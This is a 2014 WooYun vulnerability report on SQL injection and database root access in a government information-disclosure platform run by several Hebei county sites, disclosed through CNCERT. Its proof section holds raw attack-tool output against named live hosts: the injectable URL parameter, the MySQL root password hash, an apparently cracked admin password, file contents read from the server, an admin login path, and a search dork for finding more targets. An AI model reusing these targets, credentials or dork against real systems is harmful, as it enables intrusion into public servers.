当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055863

漏洞标题:某政府信息公开平台系统的通用问题打包(后可扫+弱+注+读+ROOT权)

相关厂商:某政府信息公开平台系统

漏洞作者: 雅柏菲卡

提交时间:2014-04-08 11:51

修复时间:2014-07-07 11:52

公开时间:2014-07-07 11:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-13: 厂商已经确认,细节仅向厂商公开
2014-04-16: 细节向第三方安全合作伙伴开放
2014-06-07: 细节向核心白帽子及相关领域专家公开
2014-06-17: 细节向普通白帽子公开
2014-06-27: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

..........

详细说明:

..........

漏洞证明:

定州市 
Target: http://info.dzs.gov.cn/index.do?templet=list_tc&ID=315
Host IP: 121.18.18.37
Web Server: Apache-Coyote/1.1
DB Server: MySQL >=5
Resp. Time(avg): 875 ms
Current User: root@localhost
Current DB: inforopen
Sql Version: 5.0.22-community
System User: root@localhost
Compile OS: Win32
DB User & Pass: root:*22DBA0E9D97639C88F64806498057BEDCF16A321:localhost
Data Bases: information_schema
inforopen
mysql
test

1.png


46F94C8DE14FB36680850768FF1B7F2A
123qwe
C:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect
C:\360ld=鎵撹ˉ涓佸紩璧疯摑灞?鏃犳硶鍚姩鏃?璇烽€夋椤逛慨澶嶇郴缁?
http://info.dzs.gov.cn/mlogin.zul
后台
承德市
Target: http://121.26.200.64:88/index.do?templet=list_tc&ID=283
Host IP: 121.26.200.64
Web Server: Apache-Coyote/1.1
DB Server: MySQL
Resp. Time(avg): 1335 ms
Current DB: inforopen
Sql Version: 5.0.22-community
Current User: root@localhost
System User: root@localhost
Compile OS: Win32
DB User & Pass: root:*22DBA0E9D97639C88F64806498057BEDCF16A321:localhost
Data Bases: information_schema
inforopen
mysql
test
安国市
Target: http://221.194.37.24:85/index.do?templet=list_tc&ID=277
Host IP: 221.194.37.24
Web Server: Apache-Coyote/1.1
DB Server: MySQL >=5
Resp. Time(avg): 592 ms
Current User: root@localhost
Current DB: inforopen
Sql Version: 5.0.22-community
DB User & Pass: root:*22DBA0E9D97639C88F64806498057BEDCF16A321:localhost
Compile OS: Win32
System User: root@localhost
Data Bases: information_schema
inforopen
mysql
test
玉田县
Target: http://xxgk.yutian.gov.cn/index.do?templet=list_tc&ID=308
Host IP: 60.2.47.59
Web Server: Apache-Coyote/1.1
DB Server: MySQL
Resp. Time(avg): 1217 ms
Current DB: inforopen
Current User: root@localhost
Sql Version: 5.0.22-community
System User: root@localhost
DB User & Pass: root:*22DBA0E9D97639C88F64806498057BEDCF16A321:localhost
Compile OS: Win32
Data Bases: information_schema
inforopen
mysql
test
http://www.google.com.hk/search?q=index.do%3Ftemplet%3Dlist_tc
还有很多

修复方案:

..........

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-13 09:59

厂商回复:

CNVD未直接确认生产厂商,根据测试案例,主要涉及河北省政府部门,已经在9日复现后由CNCERT下发给河北分中心处置。

最新状态:

暂无